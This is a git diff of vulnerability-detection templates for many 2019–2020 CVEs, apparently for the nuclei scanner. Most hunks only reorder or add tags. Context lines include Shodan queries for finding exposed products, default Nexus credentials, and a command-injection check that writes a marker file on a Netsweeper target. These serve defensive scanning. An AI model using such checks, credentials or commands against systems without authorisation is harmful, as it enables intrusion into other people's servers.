cve,cve2019,homematic,lfi,eq-3 + tags: cve2019,cve,homematic,lfi,eq-3 http: - method: GET diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml index e19202b6ed..37ebf886f7 100644 --- a/http/cves/2019/CVE-2019-9733.yaml +++ b/http/cves/2019/CVE-2019-9733.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: jfrog product: artifactory - tags: packetstorm,cve,cve2019,artifactory,login,jfrog + tags: cve,cve2019,packetstorm,artifactory,login,jfrog http: - raw: diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml index d1ea575d6e..578546913b 100644 --- a/http/cves/2019/CVE-2019-9922.yaml +++ b/http/cves/2019/CVE-2019-9922.yaml @@ -26,7 +26,7 @@ info: vendor: harmistechnology product: je_messenger framework: joomla\! - tags: cve,cve2019,joomla,messenger,lfi,harmistechnology,joomla\! + tags: cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla\! http: - method: GET diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml index 6c2fc36800..842408d059 100644 --- a/http/cves/2019/CVE-2019-9955.yaml +++ b/http/cves/2019/CVE-2019-9955.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: zyxel product: atp200_firmware - tags: zyxel,packetstorm,seclists,edb,cve,cve2019,xss + tags: cve,cve2019,zyxel,packetstorm,seclists,edb,xss http: - method: GET diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml index 98f40f0ed5..749b119d2b 100644 --- a/http/cves/2020/CVE-2020-0618.yaml +++ b/http/cves/2020/CVE-2020-0618.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: microsoft product: sql_server - tags: cve2020,rce,packetstorm,cve,microsoft + tags: cve,cve2020,rce,packetstorm,microsoft http: - method: GET diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml index 271fb23d30..cb1b0baec0 100644 --- a/http/cves/2020/CVE-2020-10148.yaml +++ b/http/cves/2020/CVE-2020-10148.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: solarwinds product: orion_platform - tags: cve,cve2020,solarwinds,rce,auth-bypass,kev + tags: cve2020,cve,solarwinds,rce,auth-bypass,kev variables: string: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml index dd7047555f..208b477229 100644 --- a/http/cves/2020/CVE-2020-10199.yaml +++ b/http/cves/2020/CVE-2020-10199.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: sonatype product: nexus - tags: packetstorm,cve,cve2020,sonatype,nexus,rce,kev + tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev variables: username: admin password: admin123 diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml index 58aa6fac33..faba59cf08 100644 --- a/http/cves/2020/CVE-2020-10220.yaml +++ b/http/cves/2020/CVE-2020-10220.yaml @@ -30,7 +30,7 @@ info: vendor: rconfig product: rconfig shodan-query: title:"rConfig" - tags: packetstorm,cve,cve2020,rconfig,sqli + tags: cve,cve2020,packetstorm,rconfig,sqli variables: num: "999999999" diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml index c8307a8564..e867ee9760 100644 --- a/http/cves/2020/CVE-2020-10546.yaml +++ b/http/cves/2020/CVE-2020-10546.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: rconfig product: rconfig - tags: cve,cve2020,rconfig,sqli + tags: cve2020,cve,rconfig,sqli http: - method: GET diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml index e72d83a571..36a6e766d9 100644 --- a/http/cves/2020/CVE-2020-10770.yaml +++ b/http/cves/2020/CVE-2020-10770.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: redhat product: keycloak - tags: keycloak,ssrf,oast,cve,cve2020,blind,packetstorm,edb,redhat + tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat http: - method: GET diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml index 1d1709dbdc..0d8bf6345f 100644 --- a/http/cves/2020/CVE-2020-11110.yaml +++ b/http/cves/2020/CVE-2020-11110.yaml @@ -27,7 +27,7 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" - tags: cve,cve2020,xss,grafana,hackerone + tags: cve2020,cve,xss,grafana,hackerone http: - raw: diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml index e0b027ed62..124aec25dc 100644 --- a/http/cves/2020/CVE-2020-11450.yaml +++ b/http/cves/2020/CVE-2020-11450.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microstrategy product: microstrategy_web - tags: packetstorm,seclists,microstrategy,exposure,jvm,config,cve,cve2020 + tags: cve2020,cve,packetstorm,seclists,microstrategy,exposure,jvm,config,xss http: - method: GET diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml index 30cd46d109..99c842feec 100644 --- a/http/cves/2020/CVE-2020-11455.yaml +++ b/http/cves/2020/CVE-2020-11455.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: limesurvey product: limesurvey - tags: cve2020,lfi,edb,packetstorm,cve,limesurvey + tags: cve2020,cve,lfi,edb,packetstorm,limesurvey http: - method: GET diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml index 3375043293..78c348696b 100644 --- a/http/cves/2020/CVE-2020-11529.yaml +++ b/http/cves/2020/CVE-2020-11529.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: getgrav product: grav - tags: cve,cve2020,redirect,grav,getgrav + tags: cve2020,cve,redirect,grav,getgrav http: - method: GET diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml index 5b9a607735..dce12d0607 100644 --- a/http/cves/2020/CVE-2020-11530.yaml +++ b/http/cves/2020/CVE-2020-11530.yaml @@ -30,7 +30,7 @@ info: vendor: idangero product: chop_slider framework: wordpress - tags: wpscan,seclists,cve,cve2020,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero + tags: cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero http: - raw: diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml index 71e21c7f7a..0bb52a66d0 100644 --- a/http/cves/2020/CVE-2020-11547.yaml +++ b/http/cves/2020/CVE-2020-11547.yaml @@ -27,7 +27,7 @@ info: vendor: paessler product: "prtg_network_monitor" shodan-query: title:"prtg" - tags: cve,cve2020,prtg,disclosure,paessler + tags: cve2020,cve,prtg,disclosure,paessler http: - method: GET diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml index bf793cd350..1c31689dfe 100644 --- a/http/cves/2020/CVE-2020-11738.yaml +++ b/http/cves/2020/CVE-2020-11738.yaml @@ -31,7 +31,7 @@ info: vendor: snapcreek product: duplicator framework: wordpress - tags: kev,tenable,packetstorm,cve,cve2020,wordpress,wp-plugin,lfi,snapcreek + tags: cve,cve2020,kev,tenable,packetstorm,wordpress,wp-plugin,lfi,snapcreek http: - method: GET diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml index ea3b44b2ef..75752cc24e 100644 --- a/http/cves/2020/CVE-2020-11798.yaml +++ b/http/cves/2020/CVE-2020-11798.yaml @@ -30,7 +30,7 @@ info: vendor: mitel product: micollab_audio\,_web_\&_video_conferencing shodan-query: html:"Mitel" html:"MiCollab" - tags: packetstorm,cve,cve2020,mitel,micollab,lfi + tags: cve,cve2020,packetstorm,mitel,micollab,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml index 12960bb425..943c507d90 100644 --- a/http/cves/2020/CVE-2020-11853.yaml +++ b/http/cves/2020/CVE-2020-11853.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: microfocus product: operation_bridge_manager - tags: opm,rce,packetstorm,cve,cve2020,microfocus + tags: cve,cve2020,opm,rce,packetstorm,microfocus http: - method: GET diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml index 90d99fc8a0..a617320ae7 100644 --- a/http/cves/2020/CVE-2020-11854.yaml +++ b/http/cves/2020/CVE-2020-11854.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: microfocus product: application_performance_management - tags: microfocus,packetstorm,cve,cve2020,ucmdb,rce + tags: cve2020,cve,microfocus,packetstorm,ucmdb,rce http: - method: GET diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml index 9e02c7ae18..5a5afdde05 100644 --- a/http/cves/2020/CVE-2020-11930.yaml +++ b/http/cves/2020/CVE-2020-11930.yaml @@ -28,7 +28,7 @@ info: product: translate_wordpress_with_gtranslate framework: wordpress publicwww-query: "/wp-content/plugins/gtranslate" - tags: cve,cve2020,wordpress,wp,xss,wp-plugin,wpscan,gtranslate + tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate http: - method: GET diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml index d52bb3ec5b..4208e12f2e 100644 --- a/http/cves/2020/CVE-2020-11978.yaml +++ b/http/cves/2020/CVE-2020-11978.yaml @@ -28,7 +28,7 @@ info: vendor: apache product: airflow shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" - tags: packetstorm,cve,cve2020,apache,airflow,rce,kev + tags: cve2020,cve,packetstorm,apache,airflow,rce,kev http: - raw: diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml index 73a55cf927..101f2f55eb 100644 --- a/http/cves/2020/CVE-2020-12054.yaml +++ b/http/cves/2020/CVE-2020-12054.yaml @@ -28,7 +28,7 @@ info: vendor: catchplugins product: catch_breadcrumb framework: wordpress - tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,catchplugins + tags: cve,cve2020,wordpress,xss,wp-plugin,wpscan,catchplugins http: - method: GET diff --git a/http/cves/2020/CVE-2020-12124.yaml b/http/cves/2020/CVE-2020-12124.yaml index 25b7a7cb8c..c314033273 100644 --- a/http/cves/2020/CVE-2020-12124.yaml +++ b/http/cves/2020/CVE-2020-12124.yaml @@ -21,7 +21,7 @@ info: metadata: vendor: wavlink product: wn530h4_firmware - tags: cve,cve2020,rce,wavlink + tags: cve2020,cve,rce,wavlink variables: str: "{{rand_base(3)}}" diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml index 4221612421..acaed2d131 100644 --- a/http/cves/2020/CVE-2020-12259.yaml +++ b/http/cves/2020/CVE-2020-12259.yaml @@ -24,7 +24,7 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" - tags: cve,cve2020,rconfig,authenticated,xss + tags: cve2020,cve,rconfig,authenticated,xss http: - raw: diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml index 37c9427179..3485d32a13 100644 --- a/http/cves/2020/CVE-2020-12478.yaml +++ b/http/cves/2020/CVE-2020-12478.yaml @@ -27,7 +27,7 @@ info: vendor: teampass product: teampass shodan-query: http.html:"teampass" - tags: cve,cve2020,teampass,exposure,unauth + tags: cve2020,cve,teampass,exposure,unauth http: - method: GET diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml index 9133593ec2..2833d840cd 100644 --- a/http/cves/2020/CVE-2020-12720.yaml +++ b/http/cves/2020/CVE-2020-12720.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vbulletin product: vbulletin - tags: cve2020,vbulletin,sqli,packetstorm,cve + tags: cve2020,cve,vbulletin,sqli,packetstorm http: - raw: diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml index b6fdebf4c8..025d8bc650 100644 --- a/http/cves/2020/CVE-2020-12800.yaml +++ b/http/cves/2020/CVE-2020-12800.yaml @@ -28,7 +28,7 @@ info: vendor: codedropz product: drag_and_drop_multiple_file_upload_-_contact_form_7 framework: wordpress - tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive,codedropz + tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz http: - raw: diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml index 1c1db3662f..604491ff14 100644 --- a/http/cves/2020/CVE-2020-13167.yaml +++ b/http/cves/2020/CVE-2020-13167.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: netsweeper product: netsweeper - tags: cve,cve2020,netsweeper,rce,python,webadmin + tags: cve2020,cve,netsweeper,rce,python,webadmin variables: rand_str: "{{randstr}}" cmd: 'echo "{{base64(rand_str)}}" | base64 -d > /usr/local/netsweeper/webadmin/out' diff --git a/http/cves/2020/CVE-2020-13379.yaml b/http/cves/2020/CVE-2020-13379.yaml index 6004334d7c..7d3471dbc1 100644 --- a/http/cves/2020/CVE-2020-13379.yaml +++ b/http/cves/2020/CVE-2020-13379.yaml @@ -29,7 +29,7 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" - tags: cve,cve2020,grafana,ssrf + tags: cve2020,cve,grafana,ssrf http: - method: GET diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 12c4740758..bc85406de3 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: bitrix24 product: bitrix24 - tags: cve,cve2020,xss,bitrix,bitrix24 + tags: cve2020,cve,xss,bitrix,bitrix24 http: - method: GET diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index 7b4e9f4a4e..aaefd7b5bc 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -30,7 +30,7 @@ info: vendor: extremenetworks product: extreme_management_center shodan-query: title:"Extreme Management Center" - tags: cve,cve2020,xss,extremenetworks + tags: cve2020,cve,xss,extremenetworks http: - method: GET diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index 4db56f0826..eaeaa82186 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -24,7 +24,7 @@ info: vendor: pandorafms product: pandora_fms shodan-query: title:"Pandora FMS" - tags: packetstorm,cve,cve2020,rce,pandora,unauth,artica,pandorafms + tags: cve2020,cve,packetstorm,rce,pandora,unauth,artica,pandorafms http: - raw: diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 2443529dfc..79c1fbf1ab 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -30,7 +30,7 @@ info: vendor: apache product: airflow shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" - tags: packetstorm,cve,cve2020,apache,airflow,unauth,auth-bypass,kev + tags: cve2020,cve,packetstorm,apache,airflow,unauth,auth-bypass,kev http: - method: GET diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index 5abb02b0f0..f18ff2ec1b 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: apache product: apisix - tags: intrusive,vulhub,packetstorm,cve,cve2020,apache,apisix + tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix http: - raw: diff --git a/http/cves/2020/CVE-2020-14092.yaml b/http/cves/2020/CVE-2020-14092.yaml index dc06773b20..a58b69303b 100644 --- a/http/cves/2020/CVE-2020-14092.yaml +++ b/http/cves/2020/CVE-2020-14092.yaml @@ -28,7 +28,7 @@ info: vendor: ithemes product: paypal_pro framework: wordpress - tags: wp-plugin,sqli,paypal,wpscan,cve,cve2020,wordpress,ithemes + tags: cve,cve2020,wp-plugin,sqli,paypal,wpscan,wordpress,ithemes http: - method: GET diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index b1abae80ea..bd07f857cb 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -29,7 +29,7 @@ info: vendor: gitea product: gitea shodan-query: html:"Powered by Gitea Version" - tags: cve,cve2020,rce,gitea,authenticated,git,intrusive + tags: cve2020,cve,rce,gitea,authenticated,git,intrusive http: - raw: diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 776d81bf97..6b6d120e4d 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: agentejo product: cockpit - tags: cve,cve2020,cockpit,agentejo,xss,oss + tags: cve2020,cve,cockpit,agentejo,xss,oss http: - method: GET diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 0468048928..8579aa5ce6 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -29,7 +29,7 @@ info: vendor: oracle product: fusion_middleware shodan-query: http.html:"Weblogic Application Server" - tags: cve,cve2020,rce,oracle,weblogic,unauth,kev,packetstorm + tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm http: - raw: diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 4f45e92bf0..d0a73b22ec 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: oracle product: weblogic_server - tags: cve,cve2020,oracle,rce,weblogic,oast,kev + tags: cve2020,cve,oracle,rce,weblogic,oast,kev http: - method: GET diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 26537f6002..53b11b3368 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -28,7 +28,7 @@ info: vendor: oracle product: weblogic_server shodan-query: title:"Oracle PeopleSoft Sign-in" - tags: oracle,rce,weblogic,kev,packetstorm,cve,cve2020 + tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm variables: str: "{{randstr}}" revstr: "{{reverse(str)}}" diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index be39f5d2a4..5017ff2689 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: supremainc product: biostar_2 - tags: suprema,biostar2,packetstorm,cve,cve2020,lfi,supremainc + tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc http: - method: GET diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index bb69ab6732..0b7dc6700d 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: nette product: application - tags: cve,cve2020,nette,rce + tags: cve2020,cve,nette,rce http: - method: GET diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index a48859f9d5..73f85db3b1 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: terra-master product: tos - tags: cve,cve2020,terramaster,rce,terra-master + tags: cve2020,cve,terramaster,rce,terra-master variables: filename: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 932e7922b9..ca0a265bf7 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -27,7 +27,7 @@ info: vendor: dlink product: dir-816l_firmware shodan-query: html:"DIR-816L" - tags: cve,cve2020,dlink,xss + tags: cve2020,cve,dlink,xss http: - method: GET diff --git a/http/cves/2020/CVE-2020-15920.yaml b/http/cves/2020/CVE-2020-15920.yaml index 7466a9f84a..83e58af49d 100644 --- a/http/cves/2020/CVE-2020-15920.yaml +++ b/http/cves/2020/CVE-2020-15920.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: midasolutions product: eframework - tags: cve,cve2020,mida,rce,packetstorm,midasolutions + tags: cve2020,cve,mida,rce,packetstorm,midasolutions http: - method: POST diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index c050619fc4..daf8441b85 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: saltstack product: salt - tags: vulhub,cve,cve2020,saltstack,kev + tags: cve2020,cve,vulhub,saltstack,kev variables: priv: "{{to_lower(rand_text_alpha(5))}}" roaster: "{{to_lower(rand_text_alpha(6))}}" diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index fcbf43f445..676b497dd8 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microsoft product: sharepoint_enterprise_server - tags: msf,cve,cve2020,sharepoint,iis,microsoft,ssi,rce + tags: cve,cve2020,msf,sharepoint,iis,microsoft,ssi,rce http: - method: GET diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index db411da39c..6abb14d0f0 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -26,7 +26,7 @@ info: vendor: themeinprogress product: nova_lite framework: wordpress - tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth,themeinprogress + tags: cve2020,cve,wordpress,xss,wp-plugin,wpscan,unauth,themeinprogress http: - method: GET diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index da384e2211..3520e30714 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: wso2 product: api_manager - tags: xss,wso2,cve2020,cve + tags: cve2020,cve,xss,wso2 http: - method: GET diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 0243dfa10d..debe6446af 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: seowonintech product: slc-130_firmware - tags: seowon,cve2020,oast,packetstorm,rce,router,unauth,iot,cve,seowonintech + tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index d1d234724b..03151aa6c2 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -29,7 +29,7 @@ info: vendor: thedaylightstudio product: fuel_cms shodan-query: http.title:"fuel cms" - tags: packetstorm,cve,cve2020,sqli,fuel-cms,kev,thedaylightstudio + tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio http: - raw: diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 23dd977a5b..c2b01790e1 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vbulletin product: vbulletin - tags: vbulletin,rce,kev,tenable,seclists,cve,cve2020 + tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists http: - raw: diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index a1b6abd216..163e47294f 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: articatech product: web_proxy - tags: proxy,packetstorm,cve,cve2020,rce,artica,articatech + tags: cve,cve2020,proxy,packetstorm,rce,artica,articatech http: - raw: diff --git a/http/cves/2020/CVE-2020-17506.yaml b/http/cves/2020/CVE-2020-17506.yaml index 959b7f1130..03d199abfe 100644 --- a/http/cves/2020/CVE-2020-17506.yaml +++ b/http/cves/2020/CVE-2020-17506.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: articatech product: web_proxy - tags: cve,cve2020,artica,proxy,packetstorm,articatech + tags: cve,cve2020,artica,proxy,packetstorm,articatech,sqli http: - method: GET diff --git a/http/cves/2020/CVE-2020-17518.yaml b/http/cves/2020/CVE-2020-17518.yaml index 02f6b05917..e5f5c77bac 100644 --- a/http/cves/2020/CVE-2020-17518.yaml +++ b/http/cves/2020/CVE-2020-17518.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: apache product: flink - tags: lfi,flink,fileupload,vulhub,cve,cve2020,apache,intrusive + tags: cve2020,cve,lfi,flink,fileupload,vulhub,apache,intrusive http: - raw: diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 93c766d29b..57ca6261e7 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: jeesns product: jeesns - tags: cve,cve2020,jeesns,xss + tags: cve2020,cve,jeesns,xss http: - method: GET diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index f5606ddc9d..28fa5f46d7 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: fhem product: fhem - tags: fhem,lfi,cve,cve2020 + tags: cve,cve2020,fhem,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 45788cf50c..d06e0e76de 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: apache product: ofbiz - tags: cve,cve2020,apache,xss,ofbiz + tags: cve2020,cve,apache,xss,ofbiz http: - method: GET diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index 34ef5d4184..8c27fdac0a 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -28,7 +28,7 @@ info: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 - tags: cve,cve2020,xss,qdpm,unauth + tags: cve2020,cve,xss,qdpm,unauth http: - method: GET diff --git a/http/cves/2020/CVE-2020-19625.yaml b/http/cves/2020/CVE-2020-19625.yaml index f51eb1c498..023e79a0c1 100644 --- a/http/cves/2020/CVE-2020-19625.yaml +++ b/http/cves/2020/CVE-2020-19625.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: gridx_project product: gridx - tags: cve,cve2020,gridx,rce,gridx_project + tags: cve2020,cve,gridx,rce,gridx_project http: - method: GET diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index 2129c10239..72c4961fbe 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -27,7 +27,7 @@ info: vendor: zzcms product: zzcms fofa-query: zzcms - tags: cve,cve2020,zzcms,xss + tags: cve2020,cve,zzcms,xss http: - raw: diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index 68105c02fc..ac62a19caa 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -27,7 +27,7 @@ info: vendor: weiphp product: weiphp shodan-query: http.html:"WeiPHP5.0" - tags: weiphp,sql + tags: cve,cve2020,weiphp,sql,sqli http: - method: POST diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index 78b3720fe2..284aab070c 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -26,7 +26,7 @@ info: max-request: 3 vendor: paloaltonetworks product: pan-os - tags: cve,cve2020,vpn,xss,paloaltonetworks + tags: cve2020,cve,vpn,xss,paloaltonetworks http: - raw: diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 0f735c9b61..3dd77c076d 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -28,7 +28,7 @@ info: product: gitlab_hook framework: jenkins shodan-query: 